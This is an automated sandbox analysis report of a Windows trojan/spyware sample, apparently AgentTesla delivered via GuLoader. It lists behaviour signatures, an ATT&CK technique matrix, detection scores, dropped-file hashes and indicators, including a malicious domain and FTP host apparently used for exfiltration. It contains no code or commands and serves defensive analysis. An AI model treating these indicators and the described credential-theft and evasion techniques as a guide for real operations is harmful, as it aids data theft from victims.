Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | WMI Queries: |
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | Last function: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process queried: | Jump to behavior |
Source: | Process token adjusted: | Jump to behavior | ||
Source: | Process token adjusted: | Jump to behavior | ||
Source: | Process token adjusted: | Jump to behavior |
Source: | Memory allocated: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior |
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 111 Process Injection | 11 Masquerading | 2 OS Credential Dumping | 221 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 PowerShell | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 Credentials in Registry | 1 Process Discovery | Remote Desktop Protocol | 2 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 151 Virtualization/Sandbox Evasion | Security Account Manager | 151 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 111 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Software Packing | LSA Secrets | 1 System Network Configuration Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 124 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
5% | ReversingLabs |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | ReversingLabs | |||
8% | ReversingLabs | |||
8% | ReversingLabs |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
api.ipify.org | 172.67.74.152 | true | false | unknown | |
concaribe.com | 192.185.13.234 | true | true | unknown | |
ftp.concaribe.com | unknown | unknown | true | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown | |
false |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
185.29.11.53 | unknown | European Union | 203557 | DATACLUB-NL | false | |
192.185.13.234 | concaribe.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true | |
172.67.74.152 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false |
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1518114 |
Start date and time: | 2024-09-25 12:33:39 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 36s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Run name: | Potential for more IOCs and behavior |
Number of analysed new started processes analysed: | 11 |
Number of new started drivers analysed: | 2 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | Ze1Ueabtx5.imgrenamed because original name is a hash value |
Original Sample Name: | 2a8d91f4633e838069bd4d2e4f90cf83327bae4efb9442f23198e40676c55096.unknown |
Detection: | MAL |
Classification: | mal100.troj.spyw.evad.winIMG@10/18@2/3 |
- Exclude process from analysis (whitelisted): MpCmdRun.exe, vhdmp.sys, WMIADAP.exe, SIHClient.exe, conhost.exe, fsdepends.sys
- Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
- Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
- VT rate limit hit for: Ze1Ueabtx5.img
Time | Type | Description |
---|---|---|
06:34:35 | API Interceptor | |
06:35:50 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
185.29.11.53 | Get hash | malicious | AgentTesla, GuLoader | Browse |
| |
192.185.13.234 | Get hash | malicious | AgentTesla, GuLoader | Browse |
| |
172.67.74.152 | Get hash | malicious | LummaC, Vidar | Browse |
| |
Get hash | malicious | LummaC, Vidar | Browse |
| ||
Get hash | malicious | LummaC, Vidar | Browse |
| ||
Get hash | malicious | LummaC, Vidar | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | LummaC, Vidar | Browse |
| ||
Get hash | malicious | LummaC, Stealc, Vidar | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Quasar | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
api.ipify.org | Get hash | malicious | AgentTesla, GuLoader | Browse |
| |
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | Greatness Phishing Kit, HTMLPhisher | Browse |
| ||
Get hash | malicious | Greatness Phishing Kit, HTMLPhisher | Browse |
| ||
Get hash | malicious | Greatness Phishing Kit, HTMLPhisher | Browse |
| ||
Get hash | malicious | Greatness Phishing Kit, HTMLPhisher | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
DATACLUB-NL | Get hash | malicious | AgentTesla, GuLoader | Browse |
| |
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | RedLine | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | GuLoader | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | CryptOne, Qbot | Browse |
| ||
Get hash | malicious | Lokibot | Browse |
| ||
Get hash | malicious | Qbot | Browse |
| ||
UNIFIEDLAYER-AS-1US | Get hash | malicious | AgentTesla, GuLoader | Browse |
| |
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
CLOUDFLARENETUS | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Remcos, PureLog Stealer | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
3b5074b1b5d032e5620f69f9f700ff0e | Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse |
| |
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
C:\Users\user\AppData\Local\Temp\nsl39F4.tmp\nsExec.dll | Get hash | malicious | AgentTesla, GuLoader | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | GuLoader, Remcos | Browse | |||
Get hash | malicious | GuLoader | Browse | |||
C:\Users\user\AppData\Local\acneform\Documenti di spedizione 0009333000459595995.exe | Get hash | malicious | AgentTesla, GuLoader | Browse |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 8003 |
Entropy (8bit): | 4.840877972214509 |
Encrypted: | false |
SSDEEP: | 192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J |
MD5: | 106D01F562D751E62B702803895E93E0 |
SHA1: | CBF19C2392BDFA8C2209F8534616CCA08EE01A92 |
SHA-256: | 6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D |
SHA-512: | 81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2520 |
Entropy (8bit): | 5.3958247593238235 |
Encrypted: | false |
SSDEEP: | 48:tNyFWSU4xympjgs4RIoU99tlNWR83tVAqVbB0Xjvxs8MXgeRGRXNcWpV6hhjt:tNmLHxvCsIfAXW8rBNB0XjZs8EgiGgW+ |
MD5: | 1DDB787A64168EE3263E4D4CD00EB4F2 |
SHA1: | FA2D382FD185D0E11F543B06938ADEAAEC4AFDB8 |
SHA-256: | 2699A78A6B6D8357248BB538798FAA7AB5FBBB52F58E67E2791DC361AB1A6490 |
SHA-512: | 87B74AFCD2081678DB7012B4DA14EC9B328C3004375265ACBD18DBAAC4199CAF829D01A006B67C042B27430625B202B02CA9C67465D4032B626DF6A8D71DBC5B |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 7168 |
Entropy (8bit): | 5.2959870663251625 |
Encrypted: | false |
SSDEEP: | 96:JwzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuH0DQ:JTQHDb2vSuOc41ZfUNQZGdHM |
MD5: | B4579BC396ACE8CAFD9E825FF63FE244 |
SHA1: | 32A87ED28A510E3B3C06A451D1F3D0BA9FAF8D9C |
SHA-256: | 01E72332362345C415A7EDCB366D6A1B52BE9AC6E946FB9DA49785C140BA1A4B |
SHA-512: | 3A76E0E259A0CA12275FED922CE6E01BDFD9E33BA85973E80101B8025EF9243F5E32461A113BBCC6AA75E40894BB5D3A42D6B21045517B6B3CF12D76B4CFA36A |
Malicious: | false |
Antivirus: |
